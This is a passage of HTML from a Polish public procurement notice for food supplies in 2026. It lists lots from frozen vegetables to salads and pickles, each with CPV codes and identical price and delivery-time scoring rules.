class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Warzywa, owoce mrożone </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15331100-8 - Warzywa świeże lub mrożone</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-01 do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający stosować będzie następujące<br/>kryteria oceny:<br/>Lp.<br/>Nazwa kryterium<br/>Symbol<br/>Waga (Wg)<br/>kryterium Maksymalna liczba punktów w danym kryterium<br/>1.<br/>Cena ofertowa brutto<br/>C<br/>60% Pmax1 = 60 pkt.<br/>2.<br/>Godzina dostawy<br/>G<br/>40% Pmax2 = 40 pkt.<br/>KRYTERIUM 1 – cena całkowita brutto za wykonanie przedmiotu zamówienia – [waga 60%]<br/>Oferty oceniane będą na podstawie ceny ofertowej brutto, podanej przez Wykonawcę na Formularzu Ofertowym, stanowiącym<br/>Załącznik nr1 do niniejszej SWZ i obliczane według wzoru podanego poniżej.<br/>Cn<br/>C = ---------- x 100 pkt x Wg (tj. 60 %)<br/>Cb<br/>gdzie:<br/>C - oznacza liczbę punktów przyznanych badanej ofercie<br/>Cn - oznacza cenę całkowitą brutto oferty najtańszej<br/>Cb - oznacza cenę całkowitą brutto badanej oferty Wg - oznacza wagę kryterium (w %) = 60 %<br/>Najtańsza oferowana cena, spośród ważnych ofert otrzyma 60 pkt. Pozostałe oferowane ceny, spośród ważnych ofert otrzymają<br/>odpowiednio mniej punktów, stosownie do obliczeń wynikających ze wzoru powyżej.<br/>KRYTERIUM 2 – G - godzina dostawy – [waga 40%]:<br/>Zamawiający wymaga aby dostawy objęte przedmiotem zamówienia były realizowane od godziny 6:30 do godziny zaoferowanej<br/>przez Wykonawcę, wg poniższej tabeli godzinowo-punktowej<br/>Przyznane punkty będą wynikały z opisu jak niżej.<br/>Oferty oceniane będą według zasad, jak niżej:<br/>• Dostawa do godziny 7:30 – 40 pkt.<br/>• Dostawa do godziny 7:40 – 20 pkt.<br/>• Dostawa do godziny 7:50 – 10 pkt.<br/>• Dostawa do godziny 8:00 – 0 pkt.<br/>Całkowita liczba punktów, jaką otrzyma dana oferta, zostanie obliczona wg poniższego wzoru: L=C+G<br/>gdzie:<br/>L – oznacza całkowitą liczbę przyznanych punktów<br/>C – oznacza punkty przyznane w kryterium ”Cena całkowita brutto”<br/>G – punkty przyznane w kryterium ”Godzina dostawy”<br/>2. Punktacja przyznana ofertom w poszczególnych kryteriach będzie liczona z dokładnością do dwóch miejsc po przecinku, wg<br/>zasad matematycznych, tj. wartości końcowe równe lub wyższe od 5 – w górę, a poniżej 5 w dół.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Godzina dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Produkty mleczarskie </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15500000-3 - Produkty mleczarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-01 do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający stosować będzie następujące<br/>kryteria oceny:<br/>Lp.<br/>Nazwa kryterium<br/>Symbol<br/>Waga (Wg)<br/>kryterium Maksymalna liczba punktów w danym kryterium<br/>1.<br/>Cena ofertowa brutto<br/>C<br/>60% Pmax1 = 60 pkt.<br/>2.<br/>Godzina dostawy<br/>G<br/>40% Pmax2 = 40 pkt.<br/>KRYTERIUM 1 – cena całkowita brutto za wykonanie przedmiotu zamówienia – [waga 60%]<br/>Oferty oceniane będą na podstawie ceny ofertowej brutto, podanej przez Wykonawcę na Formularzu Ofertowym, stanowiącym<br/>Załącznik nr1 do niniejszej SWZ i obliczane według wzoru podanego poniżej.<br/>Cn<br/>C = ---------- x 100 pkt x Wg (tj. 60 %)<br/>Cb<br/>gdzie:<br/>C - oznacza liczbę punktów przyznanych badanej ofercie<br/>Cn - oznacza cenę całkowitą brutto oferty najtańszej<br/>Cb - oznacza cenę całkowitą brutto badanej oferty Wg - oznacza wagę kryterium (w %) = 60 %<br/>Najtańsza oferowana cena, spośród ważnych ofert otrzyma 60 pkt. Pozostałe oferowane ceny, spośród ważnych ofert otrzymają<br/>odpowiednio mniej punktów, stosownie do obliczeń wynikających ze wzoru powyżej.<br/>KRYTERIUM 2 – G - godzina dostawy – [waga 40%]:<br/>Zamawiający wymaga aby dostawy objęte przedmiotem zamówienia były realizowane od godziny 6:30 do godziny zaoferowanej<br/>przez Wykonawcę, wg poniższej tabeli godzinowo-punktowej<br/>Przyznane punkty będą wynikały z opisu jak niżej.<br/>Oferty oceniane będą według zasad, jak niżej:<br/>• Dostawa do godziny 7:30 – 40 pkt.<br/>• Dostawa do godziny 7:40 – 20 pkt.<br/>• Dostawa do godziny 7:50 – 10 pkt.<br/>• Dostawa do godziny 8:00 – 0 pkt.<br/>Całkowita liczba punktów, jaką otrzyma dana oferta, zostanie obliczona wg poniższego wzoru: L=C+G<br/>gdzie:<br/>L – oznacza całkowitą liczbę przyznanych punktów<br/>C – oznacza punkty przyznane w kryterium ”Cena całkowita brutto”<br/>G – punkty przyznane w kryterium ”Godzina dostawy”<br/>2. Punktacja przyznana ofertom w poszczególnych kryteriach będzie liczona z dokładnością do dwóch miejsc po przecinku, wg<br/>zasad matematycznych, tj. wartości końcowe równe lub wyższe od 5 – w górę, a poniżej 5 w dół.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Godzina dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Ryby </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">03311000-2 - Ryby</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-01 do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający stosować będzie następujące<br/>kryteria oceny:<br/>Lp.<br/>Nazwa kryterium<br/>Symbol<br/>Waga (Wg)<br/>kryterium Maksymalna liczba punktów w danym kryterium<br/>1.<br/>Cena ofertowa brutto<br/>C<br/>60% Pmax1 = 60 pkt.<br/>2.<br/>Godzina dostawy<br/>G<br/>40% Pmax2 = 40 pkt.<br/>KRYTERIUM 1 – cena całkowita brutto za wykonanie przedmiotu zamówienia – [waga 60%]<br/>Oferty oceniane będą na podstawie ceny ofertowej brutto, podanej przez Wykonawcę na Formularzu Ofertowym, stanowiącym<br/>Załącznik nr1 do niniejszej SWZ i obliczane według wzoru podanego poniżej.<br/>Cn<br/>C = ---------- x 100 pkt x Wg (tj. 60 %)<br/>Cb<br/>gdzie:<br/>C - oznacza liczbę punktów przyznanych badanej ofercie<br/>Cn - oznacza cenę całkowitą brutto oferty najtańszej<br/>Cb - oznacza cenę całkowitą brutto badanej oferty Wg - oznacza wagę kryterium (w %) = 60 %<br/>Najtańsza oferowana cena, spośród ważnych ofert otrzyma 60 pkt. Pozostałe oferowane ceny, spośród ważnych ofert otrzymają<br/>odpowiednio mniej punktów, stosownie do obliczeń wynikających ze wzoru powyżej.<br/>KRYTERIUM 2 – G - godzina dostawy – [waga 40%]:<br/>Zamawiający wymaga aby dostawy objęte przedmiotem zamówienia były realizowane od godziny 6:30 do godziny zaoferowanej<br/>przez Wykonawcę, wg poniższej tabeli godzinowo-punktowej<br/>Przyznane punkty będą wynikały z opisu jak niżej.<br/>Oferty oceniane będą według zasad, jak niżej:<br/>• Dostawa do godziny 7:30 – 40 pkt.<br/>• Dostawa do godziny 7:40 – 20 pkt.<br/>• Dostawa do godziny 7:50 – 10 pkt.<br/>• Dostawa do godziny 8:00 – 0 pkt.<br/>Całkowita liczba punktów, jaką otrzyma dana oferta, zostanie obliczona wg poniższego wzoru: L=C+G<br/>gdzie:<br/>L – oznacza całkowitą liczbę przyznanych punktów<br/>C – oznacza punkty przyznane w kryterium ”Cena całkowita brutto”<br/>G – punkty przyznane w kryterium ”Godzina dostawy”<br/>2. Punktacja przyznana ofertom w poszczególnych kryteriach będzie liczona z dokładnością do dwóch miejsc po przecinku, wg<br/>zasad matematycznych, tj. wartości końcowe równe lub wyższe od 5 – w górę, a poniżej 5 w dół.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Godzina dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pieczywo i wyroby cukiernicze </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15810000-9 - Pieczywo, świeże wyroby piekarskie i ciastkarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-01 do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">. Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający stosować będzie następujące<br/>kryteria oceny:<br/>Lp.<br/>Nazwa kryterium<br/>Symbol<br/>Waga (Wg)<br/>kryterium Maksymalna liczba punktów w danym kryterium<br/>1.<br/>Cena ofertowa brutto<br/>C<br/>60% Pmax1 = 60 pkt.<br/>2.<br/>Godzina dostawy<br/>G<br/>40% Pmax2 = 40 pkt.<br/>KRYTERIUM 1 – cena całkowita brutto za wykonanie przedmiotu zamówienia – [waga 60%]<br/>Oferty oceniane będą na podstawie ceny ofertowej brutto, podanej przez Wykonawcę na Formularzu Ofertowym, stanowiącym<br/>Załącznik nr1 do niniejszej SWZ i obliczane według wzoru podanego poniżej.<br/>Cn<br/>C = ---------- x 100 pkt x Wg (tj. 60 %)<br/>Cb<br/>gdzie:<br/>C - oznacza liczbę punktów przyznanych badanej ofercie<br/>Cn - oznacza cenę całkowitą brutto oferty najtańszej<br/>Cb - oznacza cenę całkowitą brutto badanej oferty Wg - oznacza wagę kryterium (w %) = 60 %<br/>Najtańsza oferowana cena, spośród ważnych ofert otrzyma 60 pkt. Pozostałe oferowane ceny, spośród ważnych ofert otrzymają<br/>odpowiednio mniej punktów, stosownie do obliczeń wynikających ze wzoru powyżej.<br/>KRYTERIUM 2 – G - godzina dostawy – [waga 40%]:<br/>Zamawiający wymaga aby dostawy objęte przedmiotem zamówienia były realizowane od godziny 6:30 do godziny zaoferowanej<br/>przez Wykonawcę, wg poniższej tabeli godzinowo-punktowej<br/>Przyznane punkty będą wynikały z opisu jak niżej.<br/>Oferty oceniane będą według zasad, jak niżej:<br/>• Dostawa do godziny 6:30 – 40 pkt.<br/>• Dostawa do godziny 6:40 – 20 pkt.<br/>• Dostawa do godziny 7:00 – 10 pkt.<br/>• Dostawa do godziny 7:30 – 0 pkt.<br/>Całkowita liczba punktów, jaką otrzyma dana oferta, zostanie obliczona wg poniższego wzoru: L=C+G<br/>gdzie:<br/>L – oznacza całkowitą liczbę przyznanych punktów<br/>C – oznacza punkty przyznane w kryterium ”Cena całkowita brutto”<br/>G – punkty przyznane w kryterium ”Godzina dostawy”<br/>2. Punktacja przyznana ofertom w poszczególnych kryteriach będzie liczona z dokładnością do dwóch miejsc po przecinku, wg<br/>zasad matematycznych, tj. wartości końcowe równe lub wyższe od 5 – w górę, a poniżej 5 w dół.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Godzina dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 8</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Owoce, warzywa </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15300000-1 - Owoce, warzywa i podobne produkty</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-01 do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający stosować będzie następujące<br/>kryteria oceny:<br/>Lp.<br/>Nazwa kryterium<br/>Symbol<br/>Waga (Wg)<br/>kryterium Maksymalna liczba punktów w danym kryterium<br/>1.<br/>Cena ofertowa brutto<br/>C<br/>60% Pmax1 = 60 pkt.<br/>2.<br/>Godzina dostawy<br/>G<br/>40% Pmax2 = 40 pkt.<br/>KRYTERIUM 1 – cena całkowita brutto za wykonanie przedmiotu zamówienia – [waga 60%]<br/>Oferty oceniane będą na podstawie ceny ofertowej brutto, podanej przez Wykonawcę na Formularzu Ofertowym, stanowiącym<br/>Załącznik nr1 do niniejszej SWZ i obliczane według wzoru podanego poniżej.<br/>Cn<br/>C = ---------- x 100 pkt x Wg (tj. 60 %)<br/>Cb<br/>gdzie:<br/>C - oznacza liczbę punktów przyznanych badanej ofercie<br/>Cn - oznacza cenę całkowitą brutto oferty najtańszej<br/>Cb - oznacza cenę całkowitą brutto badanej oferty Wg - oznacza wagę kryterium (w %) = 60 %<br/>Najtańsza oferowana cena, spośród ważnych ofert otrzyma 60 pkt. Pozostałe oferowane ceny, spośród ważnych ofert otrzymają<br/>odpowiednio mniej punktów, stosownie do obliczeń wynikających ze wzoru powyżej.<br/>KRYTERIUM 2 – G - godzina dostawy – [waga 40%]:<br/>Zamawiający wymaga aby dostawy objęte przedmiotem zamówienia były realizowane od godziny 6:30 do godziny zaoferowanej<br/>przez Wykonawcę, wg poniższej tabeli godzinowo-punktowej<br/>Przyznane punkty będą wynikały z opisu jak niżej.<br/>Oferty oceniane będą według zasad, jak niżej:<br/>• Dostawa do godziny 7:30 – 40 pkt.<br/>• Dostawa do godziny 7:40 – 20 pkt.<br/>• Dostawa do godziny 7:50 – 10 pkt.<br/>• Dostawa do godziny 8:00 – 0 pkt.<br/>Całkowita liczba punktów, jaką otrzyma dana oferta, zostanie obliczona wg poniższego wzoru: L=C+G<br/>gdzie:<br/>L – oznacza całkowitą liczbę przyznanych punktów<br/>C – oznacza punkty przyznane w kryterium ”Cena całkowita brutto”<br/>G – punkty przyznane w kryterium ”Godzina dostawy”<br/>2. Punktacja przyznana ofertom w poszczególnych kryteriach będzie liczona z dokładnością do dwóch miejsc po przecinku, wg<br/>zasad matematycznych, tj. wartości końcowe równe lub wyższe od 5 – w górę, a poniżej 5 w dół.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Godzina dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 9</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Ziemniaki </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15310000-4 - Ziemniaki i produkty z ziemniaków</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-01 do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający stosować będzie następujące<br/>kryteria oceny:<br/>Lp.<br/>Nazwa kryterium<br/>Symbol<br/>Waga (Wg)<br/>kryterium Maksymalna liczba punktów w danym kryterium<br/>1.<br/>Cena ofertowa brutto<br/>C<br/>60% Pmax1 = 60 pkt.<br/>2.<br/>Godzina dostawy<br/>G<br/>40% Pmax2 = 40 pkt.<br/>KRYTERIUM 1 – cena całkowita brutto za wykonanie przedmiotu zamówienia – [waga 60%]<br/>Oferty oceniane będą na podstawie ceny ofertowej brutto, podanej przez Wykonawcę na Formularzu Ofertowym, stanowiącym<br/>Załącznik nr1 do niniejszej SWZ i obliczane według wzoru podanego poniżej.<br/>Cn<br/>C = ---------- x 100 pkt x Wg (tj. 60 %)<br/>Cb<br/>gdzie:<br/>C - oznacza liczbę punktów przyznanych badanej ofercie<br/>Cn - oznacza cenę całkowitą brutto oferty najtańszej<br/>Cb - oznacza cenę całkowitą brutto badanej oferty Wg - oznacza wagę kryterium (w %) = 60 %<br/>Najtańsza oferowana cena, spośród ważnych ofert otrzyma 60 pkt. Pozostałe oferowane ceny, spośród ważnych ofert otrzymają<br/>odpowiednio mniej punktów, stosownie do obliczeń wynikających ze wzoru powyżej.<br/>KRYTERIUM 2 – G - godzina dostawy – [waga 40%]:<br/>Zamawiający wymaga aby dostawy objęte przedmiotem zamówienia były realizowane od godziny 6:30 do godziny zaoferowanej<br/>przez Wykonawcę, wg poniższej tabeli godzinowo-punktowej<br/>Przyznane punkty będą wynikały z opisu jak niżej.<br/>Oferty oceniane będą według zasad, jak niżej:<br/>• Dostawa do godziny 7:30 – 40 pkt.<br/>• Dostawa do godziny 7:40 – 20 pkt.<br/>• Dostawa do godziny 7:50 – 10 pkt.<br/>• Dostawa do godziny 8:00 – 0 pkt.<br/>Całkowita liczba punktów, jaką otrzyma dana oferta, zostanie obliczona wg poniższego wzoru: L=C+G<br/>gdzie:<br/>L – oznacza całkowitą liczbę przyznanych punktów<br/>C – oznacza punkty przyznane w kryterium ”Cena całkowita brutto”<br/>G – punkty przyznane w kryterium ”Godzina dostawy”<br/>2. Punktacja przyznana ofertom w poszczególnych kryteriach będzie liczona z dokładnością do dwóch miejsc po przecinku, wg<br/>zasad matematycznych, tj. wartości końcowe równe lub wyższe od 5 – w górę, a poniżej 5 w dół.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Godzina dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 10</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Surówki i kiszonki </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15331000-7 - Warzywa przetworzone</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-01 do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający stosować będzie następujące<br/>kryteria oceny:<br/>Lp.<br/>Nazwa kryterium<br/>Symbol<br/>Waga (Wg)<br/>kryterium Maksymalna liczba punktów w danym kryterium<br/>1.<br/>Cena ofertowa brutto<br/>C<br/>60% Pmax1 = 60 pkt.<br/>2.<br/>Godzina dostawy<br/>G<br/>40% Pmax2 = 40 pkt.<br/>KRYTERIUM 1 – cena całkowita brutto za wykonanie przedmiotu zamówienia – [waga 60%]<br/>Oferty oceniane będą na podstawie ceny ofertowej brutto, podanej przez Wykonawcę na Formularzu Ofertowym, stanowiącym<br/>Załącznik nr1 do niniejszej SWZ i obliczane według wzoru podanego poniżej.<br/>Cn<br/>C = ---------- x 100 pkt x Wg (tj. 60 %)<br/>Cb<br/>gdzie:<br/>C - oznacza liczbę punktów przyznanych badanej ofercie<br/>Cn - oznacza cenę całkowitą brutto oferty najtańszej<br/>Cb - oznacza cenę całkowitą brutto badanej oferty Wg - oznacza wagę kryterium (w %) = 60 %<br/>Najtańsza oferowana cena, spośród ważnych ofert otrzyma 60 pkt. Pozostałe oferowane ceny, spośród ważnych ofert otrzymają<br/>odpowiednio mniej punktów, stosownie do obliczeń wynikających ze wzoru powyżej.<br/>KRYTERIUM 2 – G - godzina dostawy – [waga 40%]:<br/>Zamawiający wymaga aby dostawy objęte przedmiotem zamówienia były realizowane od godziny 6:30 do godziny zaoferowanej<br/>przez Wykonawcę, wg poniższej tabeli godzinowo-punktowej<br/>Przyznane punkty będą wynikały z opisu jak niżej.<br/>Oferty oceniane będą według zasad, jak niżej:<br/>• Dostawa do godziny 7:30 – 40 pkt.<br/>• Dostawa do godziny 7:40 – 20 pkt.<br/>• Dostawa do godziny 7:50 – 10 pkt.<br/>• Dostawa do godziny 8:00 – 0 pkt.<br/>Całkowita liczba punktów, jaką otrzyma dana oferta, zostanie obliczona wg poniższego wzoru: L=C+G<br/>gdzie:<br/>L – oznacza całkowitą liczbę przyznanych punktów<br/>C – oznacza punkty przyznane w kryterium ”Cena całkowita brutto”<br/>G – punkty przyznane w kryterium ”Godzina dostawy”<br/>2. Punktacja 